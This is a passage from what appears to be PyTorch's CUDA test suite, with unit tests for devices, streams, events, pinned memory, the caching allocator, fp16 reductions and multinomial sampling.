for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw
# an exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking that the
# sum of the parent and child threads' execution time is greater than
# the real execution time by at least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
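# Concretely (illustrative numbers, not measured): if each sync_func call
# spins for roughly T ms and the two threads overlap fully, then
# parent_time ~= child_time ~= total_time ~= T, so the sum is about
# 2 * total_time; if the GIL serialized them, total_time ~= 2 * T and the
# sum would only be about 1 * total_time. The 1.4x threshold separates
# the two regimes with margin.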
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For a reliable test,
# the stream to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.streams.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in-use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
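# fp16 represents integers exactly only up to 2048 and its largest finite
# value is 65504, so the exact sums asserted below are only possible if the
# reduction accumulates in a wider type (or honors an explicit
# dtype=torch.float32).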
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
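# The mean of 65536 ones must come out as exactly 1 even though the
# intermediate sum (65536) is not representable in fp16, i.e. the mean
# reduction cannot simply sum in fp16 and divide at the end.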
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in the case of a non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
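# The gather/scatter tests below re-run the shared test logic from
# AbstractTestCases._TestTorchMixin with tensors moved to CUDA. Bounds
# checking is disabled (test_bounds=False), presumably because out-of-bounds
# indices on CUDA trigger device-side asserts rather than catchable errors.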
def test_tensor_gather(self):
AbstractTestCases._TestTorchMixin._test_gather(self, lambda t: t.cuda(), False)
def test_tensor_scatter(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_', test_bounds=False)
def test_tensor_scatterAdd(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(), 'scatter_add_', test_bounds=False)
def test_scatter_add_mult_index_base(self):
AbstractTestCases._TestTorchMixin._test_scatter_add_mult_index_base(self, lambda t: t.cuda())
def test_tensor_scatterFill(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False)
def test_tensor_scatter_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', test_bounds=False, test_complex=True)
def test_tensor_scatterAdd_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_add_', test_bounds=False, test_complex=True)
def test_tensor_scatterFill_complex(self):
AbstractTestCases._TestTorchMixin._test_scatter_base(self, lambda t: t.cuda(),
'scatter_', True, test_bounds=False, test_complex=True)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test multi block memory impl
# see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu
t = torch.randint(500, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
# test global memory impl
# see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu
t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w))
t = torch.zeros([10], dtype=torch.int32, device='cuda')
# 35488 * 65536 as int32 would overflow to a negative value,
# giving a negative bin offset
t[0] = 35488
counted = t.bincount(minlength=65536)
self.assertEqual(torch.sum(counted), 10)
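# The values here (up to ~2.4e-7) are still representable in fp16, but their
# squares underflow fp16 entirely, so a norm computed purely in fp16 would be
# 0. The assert checks that the half norm stays positive, i.e. the
# accumulation is presumably done in a wider type.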
def test_tiny_half_norm_(self):
a = torch.arange(25).cuda().float()
a /= 100000000
b = a.half()
self.assertGreater(b.norm().item(), 0)
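# A p=0 "norm" counts the non-zero elements. The exact count 65536 exceeds
# fp16's largest finite value (65504), so the result is only correct if the
# requested dtype=torch.float32 is honored throughout the reduction.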
def test_norm_type_conversion(self):
a = torch.ones(65536).cuda().half()
self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536)
# Verifies that mem_get_info works, including when called for a different device
def test_mem_get_info(self):
def _test(idx):
before_free_bytes, before_available_bytes = torch.cuda.mem_get_info(idx)
t = torch.randn(1024 * 1024, device='cuda:' + str(idx))
after_free_bytes, after_available_bytes = torch.cuda.mem_get_info(idx)
self.assertTrue(after_free_bytes < before_free_bytes)
